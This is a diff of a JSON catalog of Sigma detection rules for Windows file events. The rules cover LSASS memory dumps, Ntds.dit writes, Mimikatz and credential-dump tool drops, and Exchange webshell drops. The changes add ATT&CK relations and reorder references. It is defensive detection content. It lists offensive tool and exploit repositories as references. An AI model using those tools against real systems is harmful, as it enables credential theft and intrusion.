"fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "value": "Communication To Mega.nz" }, @@ -24044,6 +30453,15 @@ "attack.t1496" ] }, + "related": [ + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", "value": "Windows Crypto Mining Pool Connections" }, @@ -24069,6 +30487,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", "value": "Msiexec Initiated Connection" }, @@ -24085,8 +30512,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", "https://adsecurity.org/?p=2398", + "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" ], "tags": [ @@ -24095,6 +30522,22 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", "value": "Suspicious Process Writes Ntds.dit" }, @@ -24111,8 +30554,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/binderlabs/DirCreate2System", "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" ], "tags": [ @@ -24137,11 +30580,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], "tags": [ @@ -24149,6 +30592,15 @@ "attack.t1036.007" ] }, + "related": [ + { + "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", "value": "Suspicious LNK Double Extension Files" }, @@ -24173,6 +30625,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "value": "Suspicious Creation TXT File in User Desktop" }, @@ -24242,6 +30703,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74", "value": "Unidentified Attacker November 2018 - File" }, @@ -24254,7 +30724,7 @@ "Legitimate use of the profile by developers or administrators" ], "filename": "file_event_win_susp_vscode_powershell_profile.yml", - "level": "high", + "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ @@ -24267,6 +30737,15 @@ "attack.t1546.013" ] }, + "related": [ + { + "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "value": "VsCode Powershell Profile Modification" }, @@ -24307,11 +30786,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", - "https://github.com/helpsystems/nanodump", - "https://www.google.com/search?q=procdump+lsass", "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://www.google.com/search?q=procdump+lsass", + "https://github.com/helpsystems/nanodump", + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" ], "tags": [ @@ -24319,6 +30798,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", "value": "LSASS Process Memory Dump Files" }, @@ -24344,6 +30832,15 @@ "cve.2021.26858" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "value": "CVE-2021-26858 Exchange Exploitation" }, @@ -24369,6 +30866,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "value": "Dumpert Process Dumper Default File" }, @@ -24395,6 +30901,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", "value": "PsExec Service File Creation" }, @@ -24435,11 +30950,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], "tags": [ @@ -24447,6 +30962,15 @@ "attack.t1036.007" ] }, + "related": [ + { + "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "value": "Suspicious Double Extension Files" }, @@ -24519,6 +31043,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "value": "GoToAssist Temporary Installation Artefact" }, @@ -24590,6 +31123,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc", "value": "Legitimate Application Dropped Executable" }, @@ -24635,6 +31177,15 @@ "attack.t1137.006" ] }, + "related": [ + { + "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "value": "Microsoft Office Add-In Loading" }, @@ -24644,7 +31195,7 @@ "author": "@ScoubiMtl", "creation_date": "2021/04/05", "falsepositive": [ - "User genuinly creates a VB Macro for their email" + "User genuinely creates a VB Macro for their email" ], "filename": "file_event_win_outlook_c2_macro_creation.yml", "level": "medium", @@ -24662,6 +31213,29 @@ "attack.t1546" ] }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "value": "Outlook C2 Macro Creation" }, @@ -24678,8 +31252,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", + "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" ], "tags": [ @@ -24687,6 +31261,15 @@ "attack.t1564" ] }, + "related": [ + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74babdd6-a758-4549-9632-26535279e654", "value": "Suspicious Executable File Creation" }, @@ -24703,9 +31286,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/hhlxf/PrintNightmare", "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/afwu/PrintNightmare", + "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" ], "tags": [ @@ -24716,6 +31299,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern" }, @@ -24740,6 +31332,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", "value": "Mimikatz MemSSP Default Log File Creation" }, @@ -24782,8 +31383,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" ], "tags": [ @@ -24794,6 +31395,15 @@ "cve.2021.31979" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum" }, @@ -24844,6 +31454,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", "value": "TeamViewer Remote Session" }, @@ -24874,6 +31493,43 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", "value": "BloodHound Collection Files" }, @@ -24924,6 +31580,15 @@ "attack.t1137" ] }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", "value": "Office Template Creation" }, @@ -24948,6 +31613,15 @@ "attack.t1195.001" ] }, + "related": [ + { + "dest-uuid": "191cc6af-1bb2-4344-ab5f-28e496638720", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", "value": "Octopus Scanner Malware" }, @@ -24974,6 +31648,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", "value": "Inveigh Execution Artefacts" }, @@ -25000,6 +31683,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832", "value": "Created Files by Microsoft Sync Center" }, @@ -25024,15 +31716,26 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", "value": "Suspicious Binary Writes Via AnyDesk" }, { - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", "meta": { "author": "Greg (rule)", "creation_date": "2022/07/21", - "falsepositive": "No established falsepositives", + "falsepositive": [ + "Unknown" + ], "filename": "file_event_win_ripzip_attack.yml", "level": "high", "logsource.category": "file_event", @@ -25042,12 +31745,12 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" ], "tags": [ - "attack.t1547", - "attack.persistence" + "attack.persistence", + "attack.t1547" ] }, "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", - "value": "RipZip Attack on Startup Folder" + "value": "Potential RipZip Attack on Startup Folder" }, { "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", @@ -25062,11 +31765,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], "tags": [ @@ -25123,11 +31826,20 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", "value": "UAC Bypass Using Windows Media Player - File" }, { - "description": "Detects the creation of known powershell scripts for exploitation", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", "meta": { "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", "creation_date": "2018/04/07", @@ -25139,19 +31851,21 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/nettitude/Invoke-PowerThIEf", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/NetSPI/PowerUpSQL", "https://github.com/CsEnox/EventViewer-UACBypass", "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/NetSPI/PowerUpSQL", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/samratashok/nishang", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": [ @@ -25159,6 +31873,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "value": "Malicious PowerShell Commandlets - FileCreation" }, @@ -25175,9 +31898,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], "tags": [ @@ -25187,6 +31910,15 @@ "attack.t1505.003" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", "value": "Suspicious File Drop by Exchange" }, @@ -25213,6 +31945,15 @@ "attack.t1505.003" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "value": "Suspicious MSExchangeMailboxReplication ASPX Write" }, @@ -25229,8 +31970,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/tifkin_/status/1321916444557365248", "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" ], "tags": [ @@ -25238,6 +31979,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "value": "PCRE.NET Package Temp Files" }, @@ -25290,6 +32040,43 @@ "attack.t1003.005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "value": "Cred Dump Tools Dropped Files" }, @@ -25316,6 +32103,15 @@ "attack.t1546.013" ] }, + "related": [ + { + "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf", "value": "PowerShell Profile Modification" }, @@ -25340,6 +32136,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "value": "Installation of TeamViewer Desktop" }, @@ -25365,6 +32170,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", "value": "UAC Bypass Using .NET Code Profiler on MMC" }, @@ -25381,8 +32195,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" ], "tags": [ @@ -25414,6 +32228,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "value": "WMI Persistence - Script Event Consumer File Write" }, @@ -25439,6 +32262,15 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "value": "Potential DCOM InternetExplorer.Application DLL Hijack" }, @@ -25491,7 +32323,7 @@ "value": "Drop Binaries Into Spool Drivers Color Folder" }, { - "description": "Detects actions caused by the RedMimicry Winnti playbook", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", "meta": { "author": "Alexander Rausch", "creation_date": "2020/06/24", @@ -25503,7 +32335,7 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://redmimicry.com", + "https://redmimicry.com/posts/redmimicry-winnti/#dropper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" ], "tags": [ @@ -25512,7 +32344,7 @@ ] }, "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", - "value": "RedMimicry Winnti Playbook Dropped File" + "value": "Potential Winnti Dropper Activity" }, { "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", @@ -25527,8 +32359,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/14", + "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" ], "tags": [ @@ -25536,6 +32368,15 @@ "attack.t1552.004" ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", "value": "Suspicious PFX File Creation" }, @@ -25553,8 +32394,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/klinix5/InstallerFileTakeOver", 